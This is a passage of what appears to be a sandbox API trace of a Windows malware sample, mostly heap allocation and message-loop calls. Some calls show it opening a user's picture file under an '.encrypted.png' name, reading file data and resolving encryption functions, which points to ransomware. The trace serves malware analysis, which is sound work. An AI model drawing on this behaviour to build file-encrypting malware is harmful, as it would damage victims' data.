dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\vyeric.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.442] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.442] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0040.445] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4eb0, lpOverlapped=0x0) returned 1 [0040.445] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14eb0) returned 0xac2018 [0040.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14eb0) returned 0x935008 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.449] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14eb0) returned 0xac2018 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.449] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.450] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.450] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14eb0) returned 0xac2018 [0040.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce80 [0040.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0040.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0040.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14eb0) returned 0x949ec0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0040.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.453] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.453] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.454] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0040.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.454] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0040.455] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 